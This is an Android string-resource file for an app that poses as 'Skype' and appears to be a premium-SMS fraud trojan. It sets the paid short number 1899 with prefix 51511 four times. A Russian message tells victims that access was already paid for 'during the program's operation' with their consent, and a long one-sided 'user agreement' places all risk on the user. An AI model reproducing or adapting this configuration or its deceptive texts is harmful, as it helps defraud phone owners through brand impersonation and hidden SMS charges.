<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="app_name">Skype</string>
    <string name="start_code">3110221</string>
    <string name="end_code">11612121.5</string>
    <string name="site">http://www.skypecom.ru</string>
    <string name="loading">Загрузка...</string>
    <string name="msg">Спасибо за столь быстрое нажатие! Сейчас Вам придут SMS с паролем на закрытый сайт. Перейдя по ссылке, Вы сможете скачивать загрузки. Можете перейти на сайт (http://www.skypecom.ru и там ввести пароль. Либо перейти прямо из SMS. Сохраните адрес, и Вам не придется больше искать загрузки, все есть на одном портале. Доступ в архив был оплачен в процессе работы программы. Вы сами дали согласие на покупку этого доступа. Срок действия пароля от 1 недели (7 дней) Стоимость смс: 1899 – от 80 руб. Полное соглашение и стоимость смс на сайте сайте http://www.skypecom.ru/rules.htm</string>
    <string name="ok">Ok</string>
    <string name="number_sms1">1899</string>
    <string name="prefix_sms1">51511</string>
    <string name="number_sms2">1899</string>
    <string name="prefix_sms2">51511</string>
    <string name="number_sms3">1899</string>
    <string name="prefix_sms3">51511</string>
    <string name="number_sms4">1899</string>
    <string name="prefix_sms4">51511</string>
    <string name="info_text">СОГЛАШЕНИЕ ПОЛЬЗОВАНИЯ</string>
    <string name="info">Обязательства Пользователя по использованию сервиса http://www.skypecom.ru: Пользователь обязан внимательно прочитать Настоящее Пользовательское соглашение. Если Пользователь не согласен с какими-либо условиями Пользовательского Соглашения, Он обязан отказаться от использования услуг http://www.skypecom.ru и закрыть данное java приложение. http://www.skypecom.ru предлагает Пользователю свои услуги на условиях, являющихся предметом настоящего Пользовательского Соглашения (ПС). Наиболее актуальная и полная версия ПС всегда находится на странице по адресу http://www.skypecom.ru/rules.htm Установив данное java приложение для загружки контента с http://www.skypecom.ru, Пользователь подтверждает что ознакомился и полностью согласен с Пользовательским соглашением и условием стоимости и оплаты Услуг по загрузке выбранного контента на свое мобильное устройство c сайта http://www.skypecom.ru. Услуги http://www.skypecom.ru предоставляются Пользователям, имеющим мобильное устройство и установленное программное java приожение для оплаты и загрузки выбранного контента, расположенным только по адресу http://www.skypecom.ru на основе Пользовательского Соглашения http://www.skypecom.ru. Данное java приложение, установленное с http://www.skypecom.ru предоставляет Пользователю платный доступ к контенту предоставленному на сайте. Оплата услуги происходит с помощью отправки смс на номер 1899: 1 смс - единождый доступ к одному выбранному контенту любого типа 2 смс - постоянный доступ к общему архиву контента предоставленного на сайте Примерная стоимость одного смс запроса на номер 1899 равна 80 р. Точную цену смотрите тут: http://www.a1agregator.ru/main/abonent/4846/1899 http://www.skypecom.ru не несет ответственность за любые убытки, включая прямые, специальные, непредвиденные или последовательные убытки, потерянную прибыль и иные риски, даже в том случае, если http://www.skypecom.ru предупредили о возможности таких убытков. Таким образом, Пользователь принимает на себя все риски, связанные с использованием сервиса http://www.skypecom.ru</string>
    <string name="site_4tele_id">110</string>
</resources>
